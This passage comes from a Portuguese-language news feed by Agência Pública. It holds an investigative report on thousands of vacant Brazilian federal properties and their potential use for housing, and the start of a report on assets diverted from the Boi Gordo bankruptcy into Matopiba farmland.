da Igreja da Candelária, um edifício de 11 andares permanece vazio há cerca de oito anos. Conhecido como Palácio dos Esportes, o prédio serviu de sede para a Fundação Centro Brasileiro para a Infância e Adolescência (FCBIA), extinta em 1998, e, depois, para diversas associações esportivas que o ocuparam esporadicamente. O edifício chegou a ser cotado para servir de sede do <a href="https://apublica.org/tag/porto-maravilha/" target="_blank" rel="noopener">Porto Maravilha</a>. A reforma do Palácio dos Esportes, contudo, foi descartada, pois considerou-se inviável a obra: somente o custo inicial do <a href="https://apublica.org/wp-content/uploads/2018/06/Retrofit-Palacio-dos-Esportes.pdf">projeto de readequação das instalações</a> era de R$ 4,2 milhões.</p><p>Abandonado, o prédio, propriedade da União, foi ocupado por um grupo não identificado <a href="https://oglobo.globo.com/rio/medidas-para-incentivar-projetos-em-areas-ociosas-geram-duvidas-17279338" target="_blank" rel="noopener">em agosto de 2015</a> e esvaziado, no dia seguinte, pela Polícia Militar. Hoje, segue com as portas fechadas e deve ser destinado à Marinha, que assumirá o ônus da recuperação e manutenção das instalações.</p> <figure id="attachment_48054" aria-describedby="figcaption_attachment_48054" class="wp-caption aligncenter" itemscope itemtype="http://schema.org/ImageObject"><div class="imageAndSource"><div class='inline-image-source image-source p-1 text-right'>Google Street View</div><img itemprop="contentURL" class="wp-image-48054 size-full" src="https://apublica.org/wp-content/uploads/2018/06/Edificio-Palacio-dos-Esportes-Rio-de-Janeiro.jpg" alt="" width="1530" height="800" srcset="https://apublica.org/wp-content/uploads/2018/06/Edificio-Palacio-dos-Esportes-Rio-de-Janeiro.jpg 1530w, https://apublica.org/wp-content/uploads/2018/06/Edificio-Palacio-dos-Esportes-Rio-de-Janeiro-800x418.jpg 800w" sizes="(max-width: 1530px) 100vw, 1530px" /></div><figcaption id="figcaption_attachment_48054" class="wp-caption-text caption" itemprop="description">Edifício “Palácio dos Esportes”, propriedade da União no Centro do Rio de Janeiro, vazio ou ocupado irregularmente há oito anos</figcaption></figure><p>O Palácio dos Esportes é apenas um entre os mais de 10 mil imóveis do governo federal que estão vagos, segundo a Secretaria de Patrimônio (SPU), ligada ao Ministério do Planejamento.</p><p>A partir de <a href="https://arquivos.spu.planejamento.gov.br/owncloud/index.php/s/Rmh0oYD5Qsfk1E3">dados abertos da SPU</a>, a <strong>Pública</strong> apurou que, dos 10.304 imóveis que a secretaria afirma estarem desocupados, apenas 2.647 estão indicados nos dados disponíveis ao público.</p><p>Essa diferença de 7.657 imóveis desocupados que não constam na lista não foi explicada pela SPU até o fechamento da matéria – a secretaria se limitou a informar que o levantamento dos 10 mil imóveis vagos foi realizado em dezembro de 2017.</p><p><a id="Link1"></a>Além disso, na mesma base, outras 16 mil propriedades não possuem informação se estão ou não ocupadas. Procurada, a assessoria da SPU respondeu que pode haver mais imóveis vagos entre esses 16 mil e que essas propriedades “estão passando por um processo de recadastramento que teve início este mês [junho] e deverá estar concluído no final do ano”.</p><p style="text-align: center;"><strong>Principais tipos de imóveis vazios</strong></p><p><a href="https://apublica.org/wp-content/uploads/2018/06/1-GIF.gif"><img class="size-full wp-image-48031 alignnone" src="https://apublica.org/wp-content/uploads/2018/06/1-GIF.gif" alt="" width="1000" height="308" /></a></p><p>Além dos comprovadamente vagos, podem existir muitos outros, já que propriedades cedidas a outros órgãos, como governos e prefeituras, podem estar sob a descrição de “em guarda provisória”, caso do edifício Wilton Paes de Almeida, que desabou após um incêndio no centro de São Paulo no início de maio.</p><p>O Wilton Paes de Almeida, por exemplo, não era utilizado pelo governo havia mais de dez anos. Em outubro de 2017, a União passou o imóvel para a prefeitura de São Paulo. A justificativa era que a prefeitura deveria prevenir “invasões e depredações” e fazer limpeza periódica.</p><p>O cadastro atual da SPU lista 433 imóveis em guarda provisória em todo o país. Segundo a secretaria, a responsabilidade pela gestão do imóvel passa para quem o recebe.</p><p>Além disso, há ainda imóveis que estão desocupados e em reforma há muitos anos, sem que isso conste na listagem da SPU. Em outro exemplo no centro de São Paulo, um prédio cedido ao Tribunal Regional Eleitoral de São Paulo (TRE-SP) está desde 2014 em processo de readequação. A previsão de utilização do espaço é apenas em 2020.</p> <figure id="attachment_48057" aria-describedby="figcaption_attachment_48057" class="wp-caption aligncenter" itemscope itemtype="http://schema.org/ImageObject"><div class="imageAndSource"><div class='inline-image-source image-source p-1 text-right'>Google Street View</div><a href="https://apublica.org/wp-content/uploads/2018/06/Edificio-do-TRE-Centro-de-Sao-Paulo.jpg"><img itemprop="contentURL" class="wp-image-48057 size-full" src="https://apublica.org/wp-content/uploads/2018/06/Edificio-do-TRE-Centro-de-Sao-Paulo.jpg" alt="" width="1530" height="800" srcset="https://apublica.org/wp-content/uploads/2018/06/Edificio-do-TRE-Centro-de-Sao-Paulo.jpg 1530w, https://apublica.org/wp-content/uploads/2018/06/Edificio-do-TRE-Centro-de-Sao-Paulo-800x418.jpg 800w" sizes="(max-width: 1530px) 100vw, 1530px" /></a></div><figcaption id="figcaption_attachment_48057" class="wp-caption-text caption" itemprop="description">Edifício do TRE no Centro de SP está em obras há quatro anos e deve ser entregue apenas em 2020</figcaption></figure><h3>Imóveis sem uso podem ser transformados em moradia para sem-teto</h3><p>A dois quarteirões dos escombros do edifício Wilton Paes de Almeida, no centro de São Paulo, localiza-se o condomínio Dandara. O antigo prédio da Justiça do Trabalho, vazio durante dez anos, foi totalmente reformado e entregue a 120 famílias do movimento de Unificação das Lutas de Cortiços e Moradia (ULCM).</p><p>O Dandara foi o primeiro edifício reformado pelo programa <a href="http://www1.caixa.gov.br/gov/gov_social/municipal/programas_habitacao/entidades/entidades.asp" target="_blank" rel="noopener">Minha Casa Minha Vida Entidades</a> em São Paulo. Em 2009, o prédio vazio foi ocupado por integrantes da ULCM que pressionaram o Governo Federal para que houvesse uma destinação ao imóvel. A resposta veio em 2010, quando o Dandara foi cedido pela União através de uma Concessão de Direito Real de Uso (CDRU), uma das formas existentes para destinar propriedades à habitação popular.</p><p>“A nossa organização não ocupa para morar [indefinidamente]. Se tem um prédio vazio, sem função social, a gente ocupa para criar um fato para que o governo olhe para aquilo que está abandonado”, explica a síndica do condomínio, Marli Baffini. Com a cessão do uso, a ULCM deixou o espaço para que as reformas ocorressem. A readequação, chamada de “retrofit”, levou cerca de quatro anos e custou R$ 12 milhões.</p><a href='https://apublica.org/2018/06/milhares-de-imoveis-da-uniao-estao-vagos-para-uso/dandara-agosto-2010/'><img width="800" height="418" src="https://apublica.org/wp-content/uploads/2018/06/Dandara-Agosto-2010.jpg" class="attachment-full size-full" alt="" /></a> <a href='https://apublica.org/2018/06/milhares-de-imoveis-da-uniao-estao-vagos-para-uso/dandara-fevereiro-2011/'><img width="800" height="418" src="https://apublica.org/wp-content/uploads/2018/06/Dandara-Fevereiro-2011.jpg" class="attachment-full size-full" alt="" /></a> <a href='https://apublica.org/2018/06/milhares-de-imoveis-da-uniao-estao-vagos-para-uso/dandara-agosto-2015/'><img width="800" height="418" src="https://apublica.org/wp-content/uploads/2018/06/Dandara-Agosto-2015.jpg" class="attachment-full size-full" alt="" /></a> <a href='https://apublica.org/2018/06/milhares-de-imoveis-da-uniao-estao-vagos-para-uso/dandara-dezembro-2017/'><img width="800" height="418" src="https://apublica.org/wp-content/uploads/2018/06/Dandara-Dezembro-2017.jpg" class="attachment-full size-full" alt="" /></a><p>No centro do Rio de Janeiro, a Ocupação Manuel Congo, que já existe há cerca de dez anos, também foi reformada por meio do Minha Casa Minha Vida Entidades. O prédio, antiga sede do Instituto Nacional do Seguro Social (INSS), é hoje lar de cerca de 40 famílias do Movimento Nacional de Luta por Moradia (MNLM).</p><p>Atualmente, a SPU lista 1.684 terrenos cedidos através da CDRU em todo o Brasil, a maior parte em Maceió (450), em Alagoas. Há, ainda, 939 imóveis de uso especial concedidos para moradia (CUEM) – forma de cessão gratuita de imóveis públicos em área urbana, mais da metade (499) em Belém, no Pará.”<!-- alsoRead --></p><p>Segundo Danielle Klintowitz, arquiteta do Instituto Pólis – organização não governamental que desenvolve políticas públicas na área urbana –, o déficit habitacional poderia ser atenuado se parte dos imóveis vagos da União fosse reaproveitada para moradia, o que ela considera obrigação constitucional do governo brasileiro. “A Constituição fala sobre a função social da propriedade pública e privada. Quando a União deixa esses imóveis vagos em áreas centrais, ela está fazendo uma medida inconstitucional porque não dá função social para os imóveis”, afirma Danielle. Na avaliação da arquiteta, disponibilizar imóveis da União para habitação pode evitar que tragédias como a ocorrida no Largo do Paissandú se repitam. “A gente deveria ter um sistema mais ágil de destinação desses imóveis. O que a gente tem hoje é que a SPU tenta cobrir o passivo de décadas”, comenta.</p><p>Na experiência de Fernanda Accioly, que trabalhou na SPU de 2010 a 2013, a transferência de imóveis da União para moradia passa por uma série de obstáculos que vão desde a resistência de funcionários públicos à falta de organização de movimentos de moradia em determinadas localidades, além da recusa de prefeituras de conduzir projetos de habitação em terrenos valorizados. “Um grande interlocutor para essa proposta se concretizar são as prefeituras, que muitas vezes não aceitavam que determinadas áreas bem localizadas com serviço de infraestrutura e transporte fossem disponibilizadas para fazer habitação de interesse social. Às vezes era preciso mudar o zoneamento ou aprovar o projeto, e eles não se dispunham”, relembra.</p><p>Margareth Uemura, coordenadora entre 2004 a 2006 do Programa de Reabilitação de Áreas Centrais, da extinta Secretaria de Programas Urbanos, critica o fato de que o Minha Casa Minha Vida tenha destinado mais recursos para empreiteiras construírem novas habitações em vez de financiar a reforma de imóveis abandonados. “O Minha Casa Minha Vida foi um programa declaratoriamente feito para movimentar recursos da economia destinados à empreiteiras e aos grandes conjuntos”, avalia.</p><p>No mesmo sentido, a professora da Faculdade de Arquitetura e Urbanismo da Universidade de São Paulo (FAU/USP) Maria Lucia Refinetti afirma que a compra de terrenos para construção de moradia pode sair mais caro para as políticas habitacionais. “Não adianta a União se desfazer de um imóvel público para fazer dinheiro e depois adquirir [outro imóvel] para fazer política de habitação se precisar fazer desapropriação e acabar pagando mais por isso”, pondera. Na avaliação de Klintowitz, outro problema do Minha Casa Minha Vida foi a construção de moradia em áreas mal localizadas. “Se esse programa tivesse acontecido de verdade, a gente poderia ter produzido unidades habitacionais mais bem localizadas”, analisa.</p><h3><a id="Link2"></a>Em Brasília, condomínio privado disputa terra pública</h3><p>Segundo os registros da SPU, a cidade brasileira que mais possui imóveis da União vagos para uso é Brasília. Lá, a secretaria aponta 173 terrenos ociosos, a maioria deles, 96, na região administrativa de Santa Maria, antiga área de assentamento de famílias de baixa renda no sul do Distrito Federal.</p><p>Nessa região está o Residencial Santos Dumont, loteamento privado de casas envolvido em uma disputa com a Agência de Fiscalização do Governo do Distrito Federal (Agefis). Construído inicialmente como moradia para militares da aeronáutica, o condomínio passou a ser residência de civis – cerca de 14 mil pessoas vivem no local.</p><p>Em 2015, o residencial foi notificado pela Agefis por ter cercado irregularmente o seu entorno, isolando terrenos e serviços públicos, como uma escola e um posto policial. A Agefis <a href="https://apublica.org/wp-content/uploads/2018/06/Notificação-Agefis.jpg">ordenou a derrubada de 2 quilômetros do cercamento</a>, mas, contestada pelos moradores, a decisão não foi levada adiante. Segundo a Agefis, o residencial “não é um local de prioridade de fiscalização neste momento”. Já a administração do condomínio afirma que a cerca sempre existiu e negou ocupar terreno público.</p> <figure id="attachment_48068" aria-describedby="figcaption_attachment_48068" class="wp-caption aligncenter" itemscope itemtype="http://schema.org/ImageObject"><div class="imageAndSource"><div class='inline-image-source image-source p-1 text-right'>Google Street View</div><a href="https://apublica.org/wp-content/uploads/2018/06/Residencial-Santos-Dummont.jpg"><img itemprop="contentURL" class="wp-image-48068 size-full" src="https://apublica.org/wp-content/uploads/2018/06/Residencial-Santos-Dummont.jpg" alt="" width="1530" height="800" srcset="https://apublica.org/wp-content/uploads/2018/06/Residencial-Santos-Dummont.jpg 1530w, https://apublica.org/wp-content/uploads/2018/06/Residencial-Santos-Dummont-800x418.jpg 800w" sizes="(max-width: 1530px) 100vw, 1530px" /></a></div><figcaption id="figcaption_attachment_48068" class="wp-caption-text caption" itemprop="description">A SPU aponta que a maior parte dos terrenos vagos do Distrito Federal está nas proximidades do Condomínio Santos Dumont, que foi notificado pelo governo por cercar área pública</figcaption></figure><p>Além dos imóveis ociosos em Santa Maria, Brasília possui terrenos vagos em áreas nobres do Plano Piloto, como nas asas Norte e Sul. A Asa Norte é a campeã, com 38 terrenos vagos para uso; já na Asa Sul são seis. Fora os terrenos, as duas asas juntas possuem 49 apartamentos vagos. Há, ainda, dois andares em edifícios, três salas e duas residências vagas.</p><p>O segundo município brasileiro com mais imóveis vagos para uso é outra capital: Campo Grande, no Mato Grosso do Sul. Na cidade, a maior parte dos imóveis vagos são terrenos, sobretudo os lotes do Jardim Imá, área ao redor do aeroporto e da base aérea da Força Aérea Brasileira (FAB).</p><p>A terceira cidade na lista também fica no Mato Grosso do Sul: Ponta Porã, na divisa do estado com o Paraguai. O município possui 112 imóveis vagos para uso, a maioria deles terrenos vagos na Vila Militar, bairro próximo ao centro da cidade.</p><p style="text-align: center;"><strong>Cidades com mais imóveis vagos</strong></p><p><a href="https://apublica.org/wp-content/uploads/2018/06/2-GIF.gif"><img class="size-full wp-image-48034 alignnone" src="https://apublica.org/wp-content/uploads/2018/06/2-GIF.gif" alt="" width="1000" height="615" /></a></p><p>Campo Grande e as cidades fronteiriças do Mato Grosso do Sul fazem do estado um dos com mais imóveis vagos para uso entre os estados brasileiros. O topo da lista, contudo, é ocupado por São Paulo – o estado mais populoso do país tem 622 imóveis da União ociosos, muitos deles ex-propriedades de estatais extintas ou privatizadas.</p><p style="text-align: center;"><strong>Estados com mais imóveis vazios</strong></p><p><a href="https://apublica.org/wp-content/uploads/2018/06/3-GIF.gif"><img class="size-full wp-image-48036 alignnone" src="https://apublica.org/wp-content/uploads/2018/06/3-GIF.gif" alt="" width="1000" height="615" /></a></p><h3><a id="Link3"></a>Os terrenos ociosos fruto das privatizações da década de 1990</h3><p>A cidade paulista com mais imóveis vagos é Araraquara, onde há 103 terrenos da União sem uso. Boa parte são lotes das antigas Rede Ferroviária Federal (RFFSA) e Ferrovia Paulista S.A. (Fepasa), estatais privatizadas no final da década de 1990 pelo governo Fernando Henrique Cardoso (PSDB). Extintas, as estatais deixaram para trás terrenos não apenas em Araraquara, mas em todo o interior paulista.</p><p>Em Leme, um terreno abandonado da Fepasa chegou a ser ocupado por 120 famílias sem-teto em agosto de 2017. As famílias <a href="https://g1.globo.com/sp/sao-carlos-regiao/noticia/pm-retira-34-familias-de-area-publica-em-acao-de-reintegracao-de-posse-em-leme-sp.ghtml" target="_blank" rel="noopener">foram expulsas pela PM em outubro de 2017</a>.</p><p>Em Campinas, um edifício e dois terrenos da antiga malha ferroviária <a href="http://www.planejamento.gov.br/noticias/spu-destina-areas-da-uniao-a-cidades-paulistas-neste-sabado-24" target="_blank" rel="noopener">foram cedidos pela SPU à prefeitura</a>, um deles para projetos habitacionais para famílias de baixa renda.</p><p>A prefeitura de Rincão <a href="http://www.rincao.sp.gov.br/noticias/2013/gabinete/setembro/rincao-sai-do-cadim.html" target="_blank" rel="noopener">chegou a ser incluída no Cadastro Informativo de Créditos não Quitados do Governo Federal</a> – que limita as verbas recebidas da União – por dívidas na compra de terrenos da Fepasa na década de 1990.</p> ]]></content:encoded> <wfw:commentRss>https://apublica.org/2018/06/milhares-de-imoveis-da-uniao-estao-vagos-para-uso/feed/</wfw:commentRss> <slash:comments>0</slash:comments> </item> <item><title>Investigação indica que dinheiro dos credores da Boi Gordo virou terra em Matopiba</title><link>https://apublica.org/2018/06/investigacao-indica-que-dinheiro-dos-credores-da-boi-gordo-virou-terra-em-matopiba/</link> <comments>https://apublica.org/2018/06/investigacao-indica-que-dinheiro-dos-credores-da-boi-gordo-virou-terra-em-matopiba/#respond</comments> <pubDate>Tue, 19 Jun 2018 15:00:12 +0000</pubDate> <dc:creator><![CDATA[Ciro Barros]]></dc:creator> <category><![CDATA[Português]]></category> <category><![CDATA[agronegócio]]></category> <category><![CDATA[grilagem]]></category> <category><![CDATA[matopiba]]></category><guid isPermaLink="false">http://apublica.org/?p=47934</guid> <description><![CDATA[Enquanto 30 mil pessoas lesadas por uma das maiores falências do Brasil lutam por ressarcimento na Justiça, investigação aponta lucros astronômicos obtidos por grupo proprietário da massa falida, com auxílio de fundo de investimento]]></description> <content:encoded><![CDATA[<p><a id="Link1"></a>O dinheiro que deveria ter sido pago aos mais de 30 mil credores de uma das maiores falências da história do Brasil serviu para engordar o patrimônio do Grupo Golin, grande conglomerado do agronegócio. Segundo investigação realizada por empresa contratada pela massa falida e supervisionada pelo Ministério Público (MP), parte dos R$ 6 bilhões (em valores atualizados) devidos aos investidores lesados virou terra. E das boas: dezenas de milhares de hectares na disputada região do Matopiba (sigla formada pelas iniciais dos estados Maranhão, Tocantins, Piauí e Bahia), considerada pela Empresa Brasileira de Pesquisa Agropecuária (Embrapa) a última fronteira agrícola do país. Segundo a consultoria Informa Economics FNP, o preço médio da terra bruta por hectare na região é de R$ 12.625,00 (dados de fevereiro de 2018). Grilagens e especulação imobiliária no Matopiba <a href="https://apublica.org/2018/05/terra-a-vista-no-matopiba/" target="_blank" rel="noopener">são investigadas pela Pública</a> desde o início deste ano.</p><p><a id="Link3"></a>Parte do portfólio de um dos maiores fundos de investimentos em terras do Brasil, o Vision Brazil Investments, foi formada por meio de empréstimos a pessoas ligadas ao Grupo Golin, inclusive por um suposto “fantasma”. A Vision teve papel decisivo no retorno do dinheiro desviado da falência, de acordo com uma investigação de dez anos feita pela empresa Offshore Asset Recovery (OAR), contratada pelo síndico da falência, o advogado Gustavo Sauer, sob supervisão do MP de São Paulo. Após ter lucros milionários em operações de empréstimo firmadas com a Vision, o Grupo Golin reinvestiu valores na compra de fazendas no cerrado de Matopiba, valorizado pelo agronegócio, em estados como Piauí, Bahia e Mato Grosso. A denúncia dos representantes dos credores já rendeu ao Grupo Golin uma condenação confirmada em segunda instância no Tribunal de Justiça de São Paulo. A Vision foi condenada em primeira instância pela mesma investigação, mas teve a sentença anulada porque um juiz de segunda instância aceitou o argumento de “cerceamento de defesa” sem avaliar o mérito. Os credores, porém, ainda não viram um tostão. O total de desvio de bens, em valores atualizados, é de cerca de R$ 612 milhões.</p> <figure id="attachment_47948" aria-describedby="figcaption_attachment_47948" class="wp-caption alignnone" itemscope itemtype="http://schema.org/ImageObject"><div class="imageAndSource"><div class='inline-image-source image-source p-1 text-right'>José Cícero da Silva/Agência Pública</div><img itemprop="contentURL" class="wp-image-47948 size-full" src="https://apublica.org/wp-content/uploads/2018/06/Matopiba_José-95.jpg" alt="" width="1920" height="1280" srcset="https://apublica.org/wp-content/uploads/2018/06/Matopiba_José-95.jpg 1920w, https://apublica.org/wp-content/uploads/2018/06/Matopiba_José-95-800x533.jpg 800w, https://apublica.org/wp-content/uploads/2018/06/Matopiba_José-95-1600x1067.jpg 1600w" sizes="(max-width: 1920px) 100vw, 1920px" /></div><figcaption id="figcaption_attachment_47948" class="wp-caption-text caption" itemprop="description">Áreas do topo da chapada do Matopiba são ideais para o cultivo de commodities e foram cobiçadas pelo mercado financeiro nos últimos anos</figcaption></figure><p>A falência em questão é a das Fazendas Reunidas Boi Gordo, um império da pecuária que veio abaixo em 2004, depois de ter vendido investimentos em cabeças de gado prometendo retornos muito acima do mercado: 40% de lucro em um ano e meio, em uma época em que o investimento em pecuária rendia cerca de 9% anuais. Acabou se revelando uma arapuca. Para o MP de São Paulo, o esquema ruiu por se tratar de uma pirâmide financeira.</p><p>Fundada em 1988, a Boi Gordo virou febre de investidores em meados dos anos 1990. O presidente da empresa, Paulo Roberto de Andrade, <a href="https://www.istoedinheiro.com.br/noticias/financas/20011012/exclusivo-como-perdi-meu-boi-gordo/24721" target="_blank" rel="noopener">inspirou</a> o autor Benedito Ruy Barbosa, da TV Globo, na composição do personagem Bruno Mezenga, protagonista da novela O rei do gado, imortalizado por Antônio Fagundes. As fazendas da Boi Gordo serviram de cenário para a novela global, inclusive para a abertura, que mostrava Fagundes montado em um cavalo girando entre a boiada ao som dos violinos do grupo Orquestra da Terra.</p><p>Fagundes e Ruy Barbosa também caíram no conto da Boi Gordo e hoje integram a massa falida da empresa. Outros globais deram com os burros (ou bois) n’água, como a atriz Marisa Orth e o designer Hans Donner, criador do logotipo da Globo, além de celebridades do mundo do futebol como os ex-jogadores Evair, Vampeta, César Sampaio e o técnico pentacampeão Luiz Felipe Scolari. Até o “Tremendão” Erasmo Carlos entrou na fria. Os mais prejudicados, porém, foram cidadãos de classe média: 70% dos credores da Boi Gordo fizeram aplicações inferiores a R$ 40 mil. Em termos geográficos, a gama de investidores é proveniente de todos os estados do país e de outros 18 países como Alemanha, Argentina, França, Inglaterra, Estados Unidos, Suíça e Portugal, por exemplo.</p><p>Aposentados como Wilma de Medeiros Gelesko, 84 anos, perderam as economias de uma vida. Viúva, ela trabalha até hoje numa papelaria no bairro do Tatuapé, zona leste de São Paulo. Com o sotaque paulistano carregado, conta que foi levada ao investimento pelas mãos do falecido marido, o contador Jorge Gelesko Júnior, e chegou a ter R$ 14 mil em investimento – além das aplicações do marido de R$ 60 mil – em valores da época. “Meu marido foi convencido por um colega de que aplicar na Boi Gordo seria um excelente negócio”, conta. “Ele me dizia que esse investimento seria a segurança da nossa velhice, eu já estava me aposentando na época que eu investi”, diz, lembrando que a aplicação foi feita pelo casal entre 1996 e 1997, época da primeira exibição de O rei do gado. “Eu me sinto esperançosa ainda. O meu filho sempre diz pra mim: ‘Você não vai receber esse dinheiro, quem vai receber são as suas netas’. Mas eu falo não, eu acho que vou receber sim”, afirma.</p> <figure id="attachment_47944" aria-describedby="figcaption_attachment_47944" class="wp-caption alignnone" itemscope itemtype="http://schema.org/ImageObject"><div class="imageAndSource"><div class='inline-image-source image-source p-1 text-right'>Caio Castor/Agência Pública</div><img itemprop="contentURL" class="wp-image-47944 size-full" src="https://apublica.org/wp-content/uploads/2018/06/Captura-de-Tela-2018-06-19-às-8.46.jpg" alt="" width="1920" height="1279" srcset="https://apublica.org/wp-content/uploads/2018/06/Captura-de-Tela-2018-06-19-às-8.46.jpg 1920w, https://apublica.org/wp-content/uploads/2018/06/Captura-de-Tela-2018-06-19-às-8.46-800x533.jpg 800w, https://apublica.org/wp-content/uploads/2018/06/Captura-de-Tela-2018-06-19-às-8.46-1600x1066.jpg 1600w" sizes="(max-width: 1920px) 100vw, 1920px" /></div><figcaption id="figcaption_attachment_47944" class="wp-caption-text caption" itemprop="description">“Eu me sinto esperançosa ainda”, afirma Wilma Gellesko, que aplicou as economias de uma vida na Boi Gordo</figcaption></figure><p>Wilma participa de uma das cinco associações de credores, a XV de Outubro, que tem 565 integrantes e foi fundada pelo radialista e ex-deputado estadual Afanásio Jazadji, outro lesado pela empresa. A maior delas é a <a href="http://www.albg.com.br/si/site" target="_blank" rel="noopener">Associação dos Lesados pela Fazenda Reunidas Boi Gordo S/A (ALBG)</a> e Empresas Coligadas e Associadas, com cerca de 8.400 pessoas cadastradas e mais de R$ 500 milhões em créditos a receber. O diretor da ALBG, José Luiz Peres, é ex-corretor da empresa. “Eu vendia bois para a Boi Gordo, era corretor, trabalhei dois anos lá. Era um bom investimento. Meu pai vendeu a casa dele e colocou na Boi Gordo. Eu pago aluguel com a minha mãe até hoje”, relata Peres, que herdou os créditos do pai. Também há grupos de credores não reunidos em associações.</p><h3>O misterioso sumiço dos bens</h3><p>A Boi Gordo pediu concordata em outubro de 2001. Prevista em um decreto-lei de 1945 (já revogado), a concordata era uma forma de se evitar a falência e obter desconto nas dívidas da empresa. Em troca, as empresas beneficiadas por esse instrumento legal se comprometiam em pagar seus credores em dois anos. O pedido foi feito na cidade de Comodoro, município mato-grossense próximo à fronteira com a Bolívia, situado a mais de 600 quilômetros de Cuiabá, para onde o antigo dono do império da Boi Gordo, Paulo Roberto de Andrade, transferiu a sede da empresa dois meses antes. A mudança de sede foi contestada de imediato por grupos de advogados dos credores, que a viram como artimanha para fraudar as dívidas. Depois de uma longa discussão judicial sobre se a concordata deveria correr em São Paulo ou no Mato Grosso, em outubro de 2003 o STJ definiu que o processo deveria correr em terras paulistas.</p><p>Essa questão de competência ainda não havia sido decidida quando Paulo Roberto de Andrade vendeu o controle acionário da Boi Gordo para duas empresas ligadas a dois grupos do agronegócio: o <a href="http://www.sperafico.com.br/" target="_blank" rel="noopener">Grupo Sperafico</a>, um clã da soja oriundo do Paraná, com tentáculos no Congresso Nacional – o mais recente membro da família a ocupar cargo legislativo é o deputado federal Dilceu Sperafico (PP-PR), eleito em 2014 e <a href="http://www.aen.pr.gov.br/modules/noticias/article.php?storyid=97991&tit=Governadora-da-posse-a-Dilceu-Sperafico-na-chefia-da-Casa-Civil" target="_blank" rel="noopener">atualmente chefe da Casa Civil no governo estadual paranaense</a>; e o <a href="https://www.facebook.com/grupogolin/" target="_blank" rel="noopener">Grupo Golin</a>, que iniciou suas atividades no Mato Grosso do Sul nos anos 1980 e se espalhou por nove estados brasileiros nas décadas seguintes. A venda foi feita em julho de 2003 para as empresas Cobrazem (Grupo Sperafico) e Satcar do Brasil (Grupo Golin). No acordo, sigiloso e não registrado na Junta Comercial do Estado de São Paulo (Jucesp), conforme estabelece a lei, ficou determinado que a Satcar indicaria futuramente os novos sócios.</p><p>De acordo com documentos obtidos pela <strong>Pública</strong>, ambas as empresas declararam que queriam “renegociar as dívidas [da Boi Gordo] com os credores e financiar novas operações, envolvendo basicamente a utilização das terras para plantio de gêneros para exportação”. A Cobrazem pulou fora do negócio em 2003 e a Satcar indicou outra empresa do Grupo Golin para assumir o controle acionário – a Forte Colonizadora e Empreendimentos Ltda., cujos sócios são Júlio Lourenço Golin e Jocenir Pedro Golin, que assumiram um passivo de R$ 930 milhões (R$ 2,1 bilhões em valores atuais).</p><p>Recuperar a Boi Gordo seria uma tarefa quase impossível. Indicado por um juiz de Comodoro (MT) quando foi feito o pedido de concordata, o perito Wanderley Ferreira Bendes avaliou ser inviável a reabilitação da Boi Gordo por falta de capital de giro e ausência de liquidez para sanar as dívidas e seguir as atividades. Em abril de 2004, sem honrar nenhum pagamento aos credores no período da concordata, a falência da empresa foi decretada. Só então se descobriu que os bens que seriam arrecadados e vendidos para ressarcir os credores haviam desaparecido. O patrimônio da Boi Gordo, que constava no balanço da empresa quando foi pedida a concordata, havia sido drasticamente reduzido – sobrando apenas algumas propriedades rurais imobilizadas pela Comissão de Valores Mobiliários (CVM). Maquinário e frota de veículos, material genético, banco de sêmen, propriedades rurais e urbanas, contratos de arrendamento desapareceram antes que fossem usados para ressarcir os credores.</p> <figure id="attachment_47947" aria-describedby="figcaption_attachment_47947" class="wp-caption alignnone" itemscope itemtype="http://schema.org/ImageObject"><div class="imageAndSource"><div class='inline-image-source image-source p-1 text-right'>José Cícero da Silva/Agência Pública</div><img itemprop="contentURL" class="wp-image-47947 size-full" src="https://apublica.org/wp-content/uploads/2018/06/Matopiba_José-68.jpg" alt="" width="1920" height="1280" srcset="https://apublica.org/wp-content/uploads/2018/06/Matopiba_José-68.jpg 1920w, https://apublica.org/wp-content/uploads/2018/06/Matopiba_José-68-800x533.jpg 800w, https://apublica.org/wp-content/uploads/2018/06/Matopiba_José-68-1600x1067.jpg 1600w" sizes="(max-width: 1920px) 100vw, 1920px" /></div><figcaption id="figcaption_attachment_47947" class="wp-caption-text caption" itemprop="description">Maquinário da Boi Gordo foi desviado pelo grupo Golin, segundo decisão judicial já validada em segunda instância</figcaption></figure><p>“Houve um desvio brutal de bens da Boi Gordo. E nada dessa movimentação de bens entrou no caixa da Boi Gordo nem foi formalizado perante a Junta Comercial”, afirma o promotor de Falências do Ministério Público de São Paulo, Eronides Santos. Sob a supervisão do MP, a <a href="https://economia.estadao.com.br/noticias/geral,os-farejadores-de-dinheiro-no-exterior-imp-,1085193" target="_blank" rel="noopener">empresa especializada em investigação de falências OAR</a> passou a buscar os responsáveis pelo desvio dos bens do antigo império do gado. A investigação levou uma década, entre 2004 e 2014, para desvendar a complicada trama financeira que havia surrupiado os bilhões da massa falida da Boi Gordo para engordar o patrimônio do Grupo Golin. O trabalho resultou em uma denúncia por parte do MP que culminou em uma condenação do Grupo Golin em junho de 2015, já confirmada em segunda instância.</p><p>Segundo a decisão de primeira instância do processo que analisa a denúncia de fraude à falência da Boi Gordo – estendida ao Grupo Golin e subsidiárias da Vision Brazil –, não houve por parte do Grupo Golin negociação com credores, aporte de capital de giro ou tentativa de dar continuidade aos negócios da Boi Gordo. Houve, sim, segundo a<a href="https://apublica.org/wp-content/uploads/2018/06/FraudeFalência_BoiGordo.pdf" target="_blank" rel="noopener"> decisão do juiz</a> Marcelo Barbosa Sacramone, um esforço de “apropriação de recursos sem pagamento à concordatária”. O total do patrimônio líquido à época da concordata era cerca de R$ 500 milhões.</p><p>Um exemplo de fraude, conforme a decisão judicial, foi o desaparecimento do gado da empresa – à época da derrocada, os balanços registravam um valor superior a R$ 85 milhões em animais, embriões e sêmen de gado. Só de gado puro de origem, eram cerca de 8 mil cabeças, segundo depoimento do próprio Paulo Roberto de Andrade no processo judicial.</p><p>A sentença apontou que boa parte do patrimônio em animais foi apropriada por outras empresas do Grupo Golin. O mesmo ocorreu com boa parte dos 300 mil hectares em nome da Boi Gordo. Meses depois de ter assumido o controle da falida, o grupo reabilitou a empresa Eldorado Agroindustrial, e a Forte arrendou à Eldorado uma série de fazendas sem nenhuma contrapartida ou repasse do valor arrecadado aos credores. Foi o caso dos imóveis rurais: Realeza I, II, III, IV e V; Sítio Atlas; Bairro do Porto I, II, III, IV, V, VI, VII, VIII e IX e Guaporé I e II.</p><h3>Um patriarca e um fantasma</h3><p>Dois personagens são figuras-chave nessa história. Um deles é o patriarca do Grupo Golin, Joselito Golin, que, apesar do nome de batismo, sempre se apresenta como Paulo. O outro é uma figura nebulosa chamada Paulo Roberto da Rosa. Pairam dúvidas se Rosa realmente 